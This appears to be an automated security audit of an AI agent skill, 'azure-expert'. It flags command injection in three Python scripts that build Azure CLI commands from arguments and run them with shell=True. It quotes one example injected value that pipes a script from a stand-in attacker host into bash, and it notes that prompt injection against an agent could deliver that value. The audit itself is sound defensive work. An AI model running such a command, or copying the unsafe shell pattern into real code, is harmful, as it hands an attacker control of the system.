NYC

azure-expert

Fail

Audited by Gen Agent Trust Hub on Feb 17, 2026

Risk Level: HIGH
COMMAND_EXECUTION
Full Analysis
  • [COMMAND_EXECUTION] (HIGH): Multiple scripts utilize unsafe shell execution patterns that are vulnerable to command injection.
  • Evidence in scripts/cost_analyzer.py: The resource_group argument from argparse is interpolated into a command string: cmd += f" --resource-group {resource_group}" and then executed via subprocess.run(f"az {cmd}", shell=True).
  • Evidence in scripts/deploy_webapp.py: The script constructs deployment commands using f-strings, such as run_command(f"az group create --name {resource_group} --location {location}"). Because shell=True is used in the run_command helper, shell metacharacters in the arguments will be interpreted.
  • Evidence in scripts/resource_status.py: Functions like check_webapp_status pass the name and resource_group arguments directly into shell commands: run_az_command(f"webapp show --name {name} --resource-group {resource_group}").
  • Risk: A malicious user or an indirect prompt injection attack could provide an argument like "my-rg; curl http://attacker.com/shell.sh | bash" to gain full control of the execution environment.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level: HIGH
Analyzed: Feb 17, 2026, 05:34 PM